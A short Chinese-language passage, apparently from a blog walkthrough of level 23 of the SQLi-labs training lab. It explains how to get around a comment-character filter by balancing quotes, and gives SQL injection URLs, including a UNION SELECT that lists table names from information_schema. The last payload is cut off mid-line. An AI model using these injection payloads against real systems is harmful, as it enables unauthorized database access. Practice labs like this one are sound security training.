Sqlilabs-23

第 23 關對注入字符做了正則表達式的過濾,所以需要在引號上下功夫: http://sqlilabs/Less-23/?id=1' and '1 知道了原理構造起來就很簡單了: –查表 http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tab
本站公眾號
   歡迎關注本站公眾號,獲取更多信息